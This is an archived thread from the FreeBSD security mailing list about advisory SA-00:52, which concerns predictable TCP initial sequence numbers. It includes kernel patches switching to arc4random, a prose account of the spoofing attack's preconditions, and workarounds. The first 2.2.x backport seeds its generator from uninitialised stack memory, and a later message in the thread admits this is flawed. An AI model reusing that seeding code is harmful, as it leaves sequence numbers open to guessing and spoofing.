hub.freebsd.org (Postfix) with ESMTP id 8C18E37B503 for ; Fri, 6 Oct 2000 11:24:04 -0700 (PDT) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id e96INF900326; Fri, 6 Oct 2000 11:23:15 -0700 (PDT) Date: Fri, 6 Oct 2000 11:23:15 -0700 From: Alfred Perlstein To: Warner Losh Cc: Dmitry Valdov , Ruslan Ermilov , Fernando Schapachnik , security@FreeBSD.ORG Subject: Re: HERT advisory: FreeBSD IP Spoofing (fwd) Message-ID: <20001006112315.A266@fw.wintelcom.net> References: <200010061713.LAA09674@harmony.village.org> <20001006103657.D27736@fw.wintelcom.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.4i In-Reply-To: <20001006103657.D27736@fw.wintelcom.net>; from bright@wintelcom.net on Fri, Oct 06, 2000 at 10:36:57AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Alfred Perlstein [001006 10:37] wrote: > * Warner Losh [001006 10:15] wrote: > > In message Dmitry Valdov writes: > > : And how about 2.x branch? > > > > I don't think anybody has backported it yet. > > I'm on it. I just booted a box, things look OK, please review as this is a bit more complex than the other patches because of a lack of arc4 random in 2.2.x Index: i386/conf/files.i386 =================================================================== RCS file: /home/ncvs/src/sys/i386/conf/Attic/files.i386,v retrieving revision 1.141.2.25 diff -u -u -r1.141.2.25 files.i386 --- i386/conf/files.i386 1999/09/05 08:10:53 1.141.2.25 +++ i386/conf/files.i386 2000/10/06 15:56:50 @@ -256,6 +256,7 @@ libkern/strncpy.c standard libkern/udivdi3.c standard libkern/umoddi3.c standard +libkern/arc4random.c standard gnu/i386/fpemul/div_small.s optional gpl_math_emulate gnu/i386/fpemul/errors.c optional gpl_math_emulate gnu/i386/fpemul/fpu_arith.c optional gpl_math_emulate Index: libkern/arc4random.c =================================================================== RCS file: arc4random.c diff -N arc4random.c --- /dev/null Fri Oct 6 02:19:19 2000 +++ arc4random.c Fri Oct 6 09:18:44 2000 @@ -0,0 +1,111 @@ +/*- + * THE BEER-WARE LICENSE + * + * wrote this file. As long as you retain this notice you + * can do whatever you want with this stuff. If we meet some day, and you + * think this stuff is worth it, you can buy me a beer in return. + * + * Dan Moschuk + * + * $FreeBSD: src/sys/libkern/arc4random.c,v 1.6 2000/09/11 19:34:04 jhb Exp $ + */ + +#include +#include + +#define ARC4_MAXRUNS 64 + +static u_int8_t arc4_i, arc4_j; +static int arc4_initialized = 0; +static int arc4_numruns = 0; +static u_int8_t arc4_sbox[256]; + +static __inline void +arc4_swap(u_int8_t *a, u_int8_t *b) +{ + u_int8_t c; + + c = *a; + *a = *b; + *b = c; +} + +/* + * Stir our S-box. + */ +static void +arc4_randomstir (void) +{ + u_int8_t key[256]; + int r, n; + + /* r = read_random(key, sizeof(key)); */ + r = 0; /* XXX MarkM - revisit this when /dev/random is done */ + /* if r == 0 || -1, just use what was on the stack */ + if (r > 0) + { + for (n = r; n < sizeof(key); n++) + key[n] = key[n % r]; + } + + for (n = 0; n < 256; n++) + { + arc4_j = (arc4_j + arc4_sbox[n] + key[n]) % 256; + arc4_swap(&arc4_sbox[n], &arc4_sbox[arc4_j]); + } +} + +/* + * Initialize our S-box to its beginning defaults. + */ +static void +arc4_init(void) +{ + int n; + + arc4_i = arc4_j = 0; + for (n = 0; n < 256; n++) + arc4_sbox[n] = (u_int8_t) n; + + arc4_randomstir(); + arc4_initialized = 1; +} + +/* + * Generate a random byte. + */ +static u_int8_t +arc4_randbyte(void) +{ + u_int8_t arc4_t; + + arc4_i = (arc4_i + 1) % 256; + arc4_j = (arc4_j + arc4_sbox[arc4_i]) % 256; + + arc4_swap(&arc4_sbox[arc4_i], &arc4_sbox[arc4_j]); + + arc4_t = (arc4_sbox[arc4_i] + arc4_sbox[arc4_j]) % 256; + return arc4_sbox[arc4_t]; +} + +u_int32_t +arc4random(void) +{ + u_int32_t ret; + + /* Initialize array if needed. */ + if (!arc4_initialized) + arc4_init(); + if (++arc4_numruns > ARC4_MAXRUNS) + { + arc4_randomstir(); + arc4_numruns = 0; + } + + ret = arc4_randbyte(); + ret |= arc4_randbyte() << 8; + ret |= arc4_randbyte() << 16; + ret |= arc4_randbyte() << 24; + + return ret; +} Index: netinet/tcp_seq.h =================================================================== RCS file: /home/ncvs/src/sys/netinet/tcp_seq.h,v retrieving revision 1.6.4.1 diff -u -u -r1.6.4.1 tcp_seq.h --- netinet/tcp_seq.h 1999/09/05 08:18:43 1.6.4.1 +++ netinet/tcp_seq.h 2000/10/06 15:57:39 @@ -91,7 +91,7 @@ * number in the range [0-0x3ffff] that is hard to predict. */ #ifndef tcp_random18 -#define tcp_random18() ((random() >> 14) & 0x3ffff) +#define tcp_random18() (arc4random() & 0x3ffff) #endif #define TCP_ISSINCR (122*1024 + tcp_random18()) Index: netinet/tcp_subr.c =================================================================== RCS file: /home/ncvs/src/sys/netinet/tcp_subr.c,v retrieving revision 1.31.2.5 diff -u -u -r1.31.2.5 tcp_subr.c --- netinet/tcp_subr.c 1999/09/05 08:18:43 1.31.2.5 +++ netinet/tcp_subr.c 2000/10/06 15:58:29 @@ -104,7 +104,7 @@ tcp_init() { - tcp_iss = random(); /* wrong, but better than a constant */ + tcp_iss = arc4random(); /* wrong, but better than a constant */ tcp_ccgen = 1; tcp_cleartaocache(); LIST_INIT(&tcb); Index: sys/libkern.h =================================================================== RCS file: /home/ncvs/src/sys/sys/libkern.h,v retrieving revision 1.14.2.1 diff -u -u -r1.14.2.1 libkern.h --- sys/libkern.h 1999/09/05 08:22:31 1.14.2.1 +++ sys/libkern.h 2000/10/06 16:19:38 @@ -61,6 +61,7 @@ static __inline u_long ulmin(u_long a, u_long b) { return (a < b ? a : b); } /* Prototypes for non-quad routines. */ +u_int32_t arc4random __P((void)); int bcmp __P((const void *, const void *, size_t)); #ifndef HAVE_INLINE_FFS int ffs __P((int)); thanks, -- -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] "I have the heart of a child; I keep it in a jar on my desk." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 13:51: 7 2000 Delivered-To: freebsd-security@freebsd.org Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id A485D37B66C for ; Fri, 6 Oct 2000 13:51:01 -0700 (PDT) Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 13heSK-00008z-00; Fri, 06 Oct 2000 22:51:00 +0200 Date: Fri, 6 Oct 2000 22:51:00 +0200 (IST) From: Roman Shterenzon To: Alfred Perlstein Cc: security@FreeBSD.ORG Subject: Re: HERT advisory: FreeBSD IP Spoofing (fwd) In-Reply-To: <20001006112315.A266@fw.wintelcom.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org It's great to see 2.2.8 patched ! Any idea about the solaris implementation of rfc1948 ? Can this be done in FreeBSD? --Roman Shterenzon, UNIX System Administrator and Consultant [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 13:52: 8 2000 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id 0EC7437B502 for ; Fri, 6 Oct 2000 13:52:05 -0700 (PDT) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id e96KpvH05236; Fri, 6 Oct 2000 13:51:57 -0700 (PDT) Date: Fri, 6 Oct 2000 13:51:57 -0700 From: Alfred Perlstein To: Roman Shterenzon Cc: security@FreeBSD.ORG Subject: Re: HERT advisory: FreeBSD IP Spoofing (fwd) Message-ID: <20001006135157.G266@fw.wintelcom.net> References: <20001006112315.A266@fw.wintelcom.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.4i In-Reply-To: ; from roman@xpert.com on Fri, Oct 06, 2000 at 10:51:00PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Roman Shterenzon [001006 13:50] wrote: > It's great to see 2.2.8 patched ! > Any idea about the solaris implementation of rfc1948 ? > Can this be done in FreeBSD? I don't have time to look that up, what is it? SACK? If it is afaik someone is already working on it. -- -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] "I have the heart of a child; I keep it in a jar on my desk." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 14: 9:29 2000 Delivered-To: freebsd-security@freebsd.org Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id BB3C437B66C for ; Fri, 6 Oct 2000 14:09:25 -0700 (PDT) Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 13hekE-0000Ap-00; Fri, 06 Oct 2000 23:09:30 +0200 Date: Fri, 6 Oct 2000 23:09:30 +0200 (IST) From: Roman Shterenzon To: Alfred Perlstein Cc: security@FreeBSD.ORG Subject: Re: HERT advisory: FreeBSD IP Spoofing (fwd) In-Reply-To: <20001006135157.G266@fw.wintelcom.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 6 Oct 2000, Alfred Perlstein wrote: > * Roman Shterenzon [001006 13:50] wrote: > > It's great to see 2.2.8 patched ! > > Any idea about the solaris implementation of rfc1948 ? > > Can this be done in FreeBSD? > > I don't have time to look that up, what is it? SACK? > > If it is afaik someone is already working on it. RFC1948 - Defending Against Sequence Number Attacks Solaris has "sysctl" alike interface (ndd) for those; # TCP_STRONG_ISS sets the TCP initial sequence number generation parameters. # Set TCP_STRONG_ISS to be: # 0 = Old-fashioned sequential initial sequence number generation. # 1 = Improved sequential generation, with random variance in increment. # 2 = RFC 1948 sequence number generation, unique-per-connection-ID. --Roman Shterenzon, UNIX System Administrator and Consultant [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 14:16:16 2000 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id 153C437B502 for ; Fri, 6 Oct 2000 14:16:14 -0700 (PDT) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id e96LG8a06070; Fri, 6 Oct 2000 14:16:08 -0700 (PDT) Date: Fri, 6 Oct 2000 14:16:08 -0700 From: Alfred Perlstein To: Roman Shterenzon Cc: security@FreeBSD.ORG Subject: Re: HERT advisory: FreeBSD IP Spoofing (fwd) Message-ID: <20001006141608.H266@fw.wintelcom.net> References: <20001006135157.G266@fw.wintelcom.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.4i In-Reply-To: ; from roman@xpert.com on Fri, Oct 06, 2000 at 11:09:30PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Roman Shterenzon [001006 14:09] wrote: > On Fri, 6 Oct 2000, Alfred Perlstein wrote: > > > * Roman Shterenzon [001006 13:50] wrote: > > > It's great to see 2.2.8 patched ! > > > Any idea about the solaris implementation of rfc1948 ? > > > Can this be done in FreeBSD? > > > > I don't have time to look that up, what is it? SACK? > > > > If it is afaik someone is already working on it. > RFC1948 - Defending Against Sequence Number Attacks > > Solaris has "sysctl" alike interface (ndd) for those; > > # TCP_STRONG_ISS sets the TCP initial sequence number generation parameters. > # Set TCP_STRONG_ISS to be: > # 0 = Old-fashioned sequential initial sequence number generation. > # 1 = Improved sequential generation, with random variance in increment. > # 2 = RFC 1948 sequence number generation, unique-per-connection-ID. I'm sure it's possible to do this with FreeBSD, from what it looks like we implement option 1, with patches i'm sure we could do '2' as well. -- -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] "I have the heart of a child; I keep it in a jar on my desk." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 14:46:23 2000 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id D836D37B502; Fri, 6 Oct 2000 14:45:41 -0700 (PDT) From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Security Advisory: FreeBSD-SA-00:52.tcp-iss Reply-To: security-advisories@freebsd.org Message-Id: <20001006214541.D836D37B502@hub.freebsd.org> Date: Fri, 6 Oct 2000 14:45:41 -0700 (PDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-00:52 Security Advisory FreeBSD, Inc. Topic: TCP uses weak initial sequence numbers Category: core Module: kernel Announced: 2000-10-06 Credits: Hacker Emergency Response Team Affects: FreeBSD 3.x, 4.x and 5.x prior to the correction date Corrected: 2000-09-28 (5.0-CURRENT, 4.1.1-STABLE, 3.5.1-STABLE) FreeBSD only: NO I. Background TCP network connections use an initial sequence number as part of the connection handshaking. According to the TCP protocol, an acknowledgement packet from a remote host with the correct sequence number is trusted to come from the remote system with which an incoming connection is being established, and the connection is established. II. Problem Description It has long been known that an attacker who can guess the initial sequence number which a system will use for the next incoming TCP connection can spoof a TCP connection handshake coming from a machine to which he does not have access, and then send arbitrary data into the resulting TCP connection which will be accepted by the server as coming from the spoofed machine. Systems derived from 4.4BSD-Lite2 including FreeBSD include code which attempts to introduce an element of unpredictability into the initial sequence numbers to prevent sequence number guessing by a remote attacker. However the pseudo-random number generator used is a simple linear congruent generator, and based on observations of a few initial sequence values from legitimate connections with a server, an attacker can guess with high probability the value which will be used for the next connection. In order for this to be successfully exploited, the attacker must also satisfy the following conditions: a) be able to initiate several consecutive TCP connections to an open port on the server in a short space of time (immediately followed by the attack itself). Quiescent servers (those which are not receiving connections from other systems at the time of attack) are therefore most vulnerable to the attack. b) be able to prevent the spoofed client machine from responding to the packets sent to it from the server, by making use of an address which is offline or by executing a denial of service attack against it to prevent it from responding. c) make use of an application-level protocol on the server which authenticates or grants trust solely based on the IP address of the client, not any higher-level authentication mechanisms such as a password or cryptographic key. d) be able to guess or infer the return TCP data from the server to the spoofed client (if any), to which he will not have access, All versions of FreeBSD prior to the correction date including 4.1.1 and 3.5.1 are vulnerable to this problem. The FreeBSD Security Officer would like to thank the Hacker Emergency Response Team for working with us to bring this matter to our attention, and to coordinate the release of this advisory. III. Impact Systems running insecure protocols which blindly trust a TCP connection which appears to come from a given IP address without requiring other authentication of the originator are vulnerable to spoofing by a remote attacker, potentially yielding privileges or access on the local system. Examples of such protcols and services are: the rlogin/rsh/rexec family when used to grant passwordless access (e.g. via .rhosts or hosts.equiv files); web server address-based access controls on scripts which do not require user authentication and which control privileged resources; tcp-wrappers host access controls around services which do not authenticate the connection further; lpr address-based access controls, and others. Note that the rlogin family of protocols when configured to use Kerberos or UNIX passwords are not vulnerable to this attack since they authenticate connections (using Kerberos tickets in the former case, and account passwords in the latter). Source address based authentication in the rlogin family of protocols is not used by default, and must be specifically enabled through use of a per-user .rhosts file, or a global /etc/hosts.equiv file. Attackers can also forge TCP connections to arbitrary TCP protocols (including protocols not vulnerable to the spoofing attack described above) and simulate the effects of failed remote access attempts from a target machine (e.g. repeated attempts to guess a password), potentially misleading the administrators of the server into thinking they are under attack from the spoofed client. IV. Workaround Note that in order to exploit the vulnerability an attacker must make several real connection attempts in close succession to a port on the target machine (e.g. a web server). Since in order for the attack to be successful the machine must be quiescent (i.e. not accepting any other connections), this rapid connection activity followed by a connection to an insecure service may provide a signature which can be used to detect and trace the attacker. Possible workarounds for the vulnerability include one or both of the following: 1) Disable all insecure protocols and services including rlogin, rsh and rexec (if configured to use address-based authentication), or reconfigure them to not authenticate connections based solely on originating address. In general, the rlogin family should not be used anyway - the ssh family of commands (ssh, scp, slogin) provide a secure alternative which is included in FreeBSD 4.0 and above. To disable the rlogin family of protocols, make sure the /etc/inetd.conf file does not contain any of the following entries uncommented (i.e. if present in the inetd.conf file they should be commented out as shown below:) #shell stream tcp nowait root /usr/libexec/rshd rshd #login stream tcp nowait root /usr/libexec/rlogind rlogind #exec stream tcp nowait root /usr/libexec/rexecd rexecd Be sure to restart inetd by sending it a HUP signal after making any changes: # kill -HUP `cat /var/run/inetd.pid` Audit the use of other services including those noted in section III above and either disable the service, or if possible require it to use a stronger form of authentication. See workaround 3) below. 2) Impose IP-level packet filters on network perimeters or on local affected machines to prevent access from any outside party to a vulnerable internal service using a "privileged" source address. For example, if machines on the internal 10.0.0.0/24 network are allowed to obtain passwordless rlogin access to a server, then external users should be prevented from sending packets with 10.0.0.0/24 source addresses from the outside network into the internal network. This is standard good security policy. Note however that if an external address must be granted access to local resources then this type of filtering cannot be applied. It also does not defend against spoofing attacks from within the network perimeter. Consider disabling this service until the affected machines can be patched. 3) Enable the use of IPSEC to authenticate (and/or encrypt) vulnerable TCP connections at the IP layer. A system which requires authenticaion of all incoming connections to a port using IPSEC cannot be spoofed using the attack described in this advisory, nor can TCP sessions be hijacked by an attacker with access to the packet stream. FreeBSD 4.0 and later include IPSEC functionality in the kernel, and 4.1 and later include an IKE daemon, racoon, in the ports collection. Configuration of IPSEC is beyond the scope of this document, however see the following web resources: http://www.freebsd.org/handbook/ipsec.html http://www.netbsd.org/Documentation/network/ipsec/ http://www.kame.net/ V. Solution Note that address-based authentication is generally weak, and should be avoided even in environments running with the sequence numbering improvements. Instead, cryptographically-protected protocols and services should be used wherever possible. One of the following: 1) Upgrade your vulnerable FreeBSD system to 4.1.1-STABLE or 3.5.1-STABLE after the respective correction dates. 2a) FreeBSD 3.x systems Download the patch and detached PGP signature from the following locations, and verify the signature using your PGP utility. ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:52/tcp-iss-3.x.patch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:52/tcp-iss-3.x.patch.asc # cd /usr/src/sys/ # patch -p < /path/to/patch [ Recompile your kernel as described in http://www.freebsd.org/handbook/kernelconfig.html and reboot the system ] 2b) FreeBSD 4.x systems Apply the patch below and recompile your kernel. Either save this advisory to a file, or download the patch and detached PGP signature from the following locations, and verify the signature using your PGP utility. ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:52/tcp-iss.patch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:52/tcp-iss.patch.asc # cd /usr/src/sys/netinet # patch -p < /path/to/patch_or_advisory [ Recompile your kernel as described in http://www.freebsd.org/handbook/kernelconfig.html and reboot the system ] Patch for vulnerable 4.x systems: Index: tcp_seq.h =================================================================== RCS file: /usr2/ncvs/src/sys/netinet/tcp_seq.h,v retrieving revision 1.11 retrieving revision 1.12 diff -u -r1.11 -r1.12 --- tcp_seq.h 1999/12/29 04:41:02 1.11 +++ tcp_seq.h 2000/09/29 01:37:19 1.12 @@ -91,7 +91,7 @@ * number in the range [0-0x3ffff] that is hard to predict. */ #ifndef tcp_random18 -#define tcp_random18() ((random() >> 14) & 0x3ffff) +#define tcp_random18() (arc4random() & 0x3ffff) #endif #define TCP_ISSINCR (122*1024 + tcp_random18()) Index: tcp_subr.c =================================================================== RCS file: /usr2/ncvs/src/sys/netinet/tcp_subr.c,v retrieving revision 1.80 retrieving revision 1.81 diff -u -r1.80 -r1.81 --- tcp_subr.c 2000/09/25 23:40:22 1.80 +++ tcp_subr.c 2000/09/29 01:37:19 1.81 @@ -178,7 +178,7 @@ { int hashsize; - tcp_iss = random(); /* wrong, but better than a constant */ + tcp_iss = arc4random(); /* wrong, but better than a constant */ tcp_ccgen = 1; tcp_cleartaocache(); -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBOd5Gv1UuHi5z0oilAQEzJwQAkJbKJBJcaIYFbMuRnINbNQQS/mLUuRoh fIzPEC17B2fwx+NjuHppBXroOsmsw0enM4tk7afP2yc3z2Ecyapr+oQH9KzBQ+nQ 56IGoi5/MLgEY2KQn3kQBV++pH9zo/F/Gz3XV/x2gDUgLy0F9p2eYjDGkrA1U1H2 NTx5kXB6ZE4= =zdbr -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 15: 5:33 2000 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 1A4C137B66D for ; Fri, 6 Oct 2000 15:05:32 -0700 (PDT) Received: (from kris@localhost) by citusc17.usc.edu (8.9.3/8.9.3) id PAA00538; Fri, 6 Oct 2000 15:06:07 -0700 (PDT) Date: Fri, 6 Oct 2000 15:06:07 -0700 From: Kris Kennaway To: Fernando Schapachnik Cc: security@FreeBSD.ORG Subject: Re: HERT advisory: FreeBSD IP Spoofing (fwd) Message-ID: <20001006150607.A471@citusc17.usc.edu> References: <200010061212.JAA83234@ns1.via-net-works.net.ar> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200010061212.JAA83234@ns1.via-net-works.net.ar>; from fpscha@ns1.via-net-works.net.ar on Fri, Oct 06, 2000 at 09:12:54AM -0300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Oct 06, 2000 at 09:12:54AM -0300, Fernando Schapachnik wrote: > Many of you may have read this. > > It states that 4.1 is vulnerable, but doesn't mention 4.1.1. It also > provides URL to patches that are not accesible. Somebody has more > info? This was a fault on my part. I had planned to release advisory 00:52 yesterday and told HERT to go ahead and send theirs out on that day, but then I became enveloped in a little personal maelstrom of issues yesterday and didnt have time to release ours. It's just gone out now. Kris P.S. no-one apparently noticed that the previous advisory we released was numbered 00:53, skipping a number - this was because I had a draft advisory in my local system with duplicate numbers :-) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 16: 2:17 2000 Delivered-To: freebsd-security@freebsd.org Received: from shell.futuresouth.com (shell.futuresouth.com [198.78.58.28]) by hub.freebsd.org (Postfix) with ESMTP id 8B62F37B502; Fri, 6 Oct 2000 16:02:10 -0700 (PDT) Received: (from fullermd@localhost) by shell.futuresouth.com (8.9.3/8.9.3) id SAA07794; Fri, 6 Oct 2000 18:01:48 -0500 (CDT) Date: Fri, 6 Oct 2000 18:01:48 -0500 From: "Matthew D. Fuller" To: Jordan Hubbard Cc: Robert Watson , John Baldwin , freebsd-security@FreeBSD.ORG, cvs-committers@FreeBSD.ORG Subject: Re: Stable branch Message-ID: <20001006180148.B29088@futuresouth.com> References: <3175.970802405@winston.osd.bsdi.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3175.970802405@winston.osd.bsdi.com>; from jkh@winston.osd.bsdi.com on Thu, Oct 05, 2000 at 08:20:05PM -0700 X-OS: FreeBSD Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org [trim on the CC's a bit] On Thu, Oct 05, 2000 at 08:20:05PM -0700, a little birdie told me that Jordan Hubbard remarked > > I'm not sure I see the n-way merge. > > .. > > When a fix is required, you merge it into -STABLE, and then if > > appropriate, into the release branch also. > > Which is the n-way aspect. You've just increased the amount of > merging by n, where n is each active "release branch" you choose to > support rather than being able to merge once to the branch head and > point people at that. Sure, you can say it's only for the most minor > patches and such and merge work will be minimal, but in order to > support a user assumption that they can install release x and then > stay on the release x branch from there on out, someone still has > to remember to merge to several locations rather than one now. Ick. As someone who doesn't have to deal directly with it, I feel perfectly free to make the following comments from the sidelines ;) A) The way we're doing it now works for us. B) Obviously a lot of people want some change to provide a differentation between plain-old -STABLE and production machines, because of a real or percieved idea that -STABLE isn't also so. C) A lot of people want to stick with a -RELEASE, but still have access to security fixes (above all, though many will want serious bugfixes as well) Any idea to expand into this realm is going to be painful. The idea of creating 'branches' for each release sounds like the least painful of the group to me, however. Summary: - Each -RELEASE is a branch, onto which security (not bug, unless it's a *BIIIIIIIIIIIIIIIG* bug, like printf() not working) fixes go onto as they become necessary. - Users who want to stick with a set system, but get security fixes and keep up to date on such track the -RELEASE branch for their release, each update along which updates a 'patchlevel' or something in their version so they (and we when they bitch) know what they have fixes for. - Users who want the more 'normal' and 'minor' bugfixes track -STABLE, just like they do now. - Those of us who like to have fun track -CURRENT, like we do now. I think it might actually be easier to suck up and branch each release, and stick security fixes on the branch, than to shoot this idea down every few months for the rest of our lives ;) -- Matthew Fuller (MF4839) | fullermd@over-yonder.net Unix Systems Administrator | fullermd@futuresouth.com Specializing in FreeBSD | http://www.over-yonder.net/ "The only reason I'm burning my candle at both ends, is because I haven't figured out how to light the middle yet" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 16:19:48 2000 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id 76A8B37B503; Fri, 6 Oct 2000 16:19:44 -0700 (PDT) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id e96NJif01392; Fri, 6 Oct 2000 16:19:44 -0700 (PDT) Date: Fri, 6 Oct 2000 16:19:44 -0700 From: Alfred Perlstein To: security@freebsd.org Cc: stable@freebsd.org Subject: 2.2.x FreeBSD-SA-00:52 patch adjusted Message-ID: <20001006161944.C272@fw.wintelcom.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Because of serious breakage in the arc4random code in FreeBSD-current (3 months and counting) my initial patch to 2.2.x was flawed because the arc4random code would never re-seed itself properly. This problem could possibly lead to more easy to predict sequences. I've just added another patch that should allievate the problem, just for reference make sure src/sys/libkern/arc4random.c is has this ID tag: $FreeBSD: /c/ncvs/src/sys/libkern/arc4random.c,v 1.6.4.2 2000/10/06 22:49:54 alfred Exp $ That would be arc4random.c MFC'd from -stable (FreeBSD 4) where it should be working properly. Thanks to Kris Kennaway (kris@freebsd.org) for pointing out this error and suggesting the fix. My apologies to those who already cvsup'd and rebooted thier 2.2.x boxes. -- -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] "I have the heart of a child; I keep it in a jar on my desk." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 16:48:33 2000 Delivered-To: freebsd-security@freebsd.org Received: from static.unixfreak.org (static.unixfreak.org [63.198.170.139]) by hub.freebsd.org (Postfix) with ESMTP id 520C637B503 for ; Fri, 6 Oct 2000 16:48:26 -0700 (PDT) Received: by static.unixfreak.org (Postfix, from userid 1000) id 38B271F20; Fri, 6 Oct 2000 16:48:25 -0700 (PDT) Subject: Re: cvs commit: src/etc inetd.conf In-Reply-To: "from Walter Hop at Oct 3, 2000 03:40:54 am" To: Walter Hop Date: Fri, 6 Oct 2000 16:48:25 -0700 (PDT) Cc: Michael Bryan , security@FreeBSD.ORG From: Dima Dorfman Reply-To: dima@unixfreak.org X-Mailer: ELM [version 2.4ME+ PL82 (25)] MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Message-Id: <20001006234825.38B271F20@static.unixfreak.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > [in reply to Michael Bryan , 02/10/00] > > > If any port has a listener on it, as an admin you'd better know what that > > listener is > > This shell script should be in the base ;) > > lsof -i | grep LISTEN | awk '{ print $1 "("$3") " $9} ' | sort | > uniq Only one problem: lsof isn't in the base system. Regards -- Dima Dorfman Finger dima@unixfreak.org for my public PGP key. "If you understand everything, you must be misinformed." -- Japanese Proverb To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 19:15:36 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.gmx.net (pop.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id F20E737B503 for ; Fri, 6 Oct 2000 19:15:33 -0700 (PDT) Received: (qmail 12242 invoked by uid 0); 7 Oct 2000 02:15:31 -0000 Received: from p3ee2162b.dip.t-dialin.net (HELO speedy.gsinet) (62.226.22.43) by mail.gmx.net with SMTP; 7 Oct 2000 02:15:31 -0000 Received: (from sittig@localhost) by speedy.gsinet (8.8.8/8.8.8) id UAA11008 for freebsd-security@FreeBSD.ORG; Fri, 6 Oct 2000 20:48:08 +0200 Date: Fri, 6 Oct 2000 20:48:07 +0200 From: Gerhard Sittig To: freebsd-security@FreeBSD.ORG Subject: Re: Default Deny Message-ID: <20001006204807.M31338@speedy.gsinet> Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <200010060056.LAA11152@cairo.anu.edu.au> <39DCC1CB.5FDD7F90@allmaui.com> Mime-Version: 1.0 